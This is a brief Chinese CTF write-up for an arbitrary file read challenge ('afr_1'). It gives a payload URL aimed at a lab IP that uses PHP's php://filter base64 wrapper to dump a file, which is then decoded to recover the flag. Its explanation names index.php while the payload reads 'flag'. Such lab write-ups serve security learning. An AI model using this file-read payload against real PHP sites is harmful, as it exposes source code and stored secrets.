首页 > 其他分享> > NU1LCTFer的成长之路-web入门-任意文件读取漏洞-afr_1-wp

NU1LCTFer的成长之路-web入门-任意文件读取漏洞-afr_1-wp

2021-06-29 21:04:12 作者：互联网

payload

http://192.168.60.134/?p=php://filter/convert.base64-encode/resource=flag

这句话的意思是我们用base64编码的方式来读文件index.php；这时页面会显示出源文件index.php经过base64编码后的内容，然后经过base64解码就可以看到flag；

BP base64解码得到flag

标签：NU1LCTFer,web,index,解码,base64,flag,wp,php,afr
来源： https://blog.csdn.net/weixin_46439278/article/details/118343699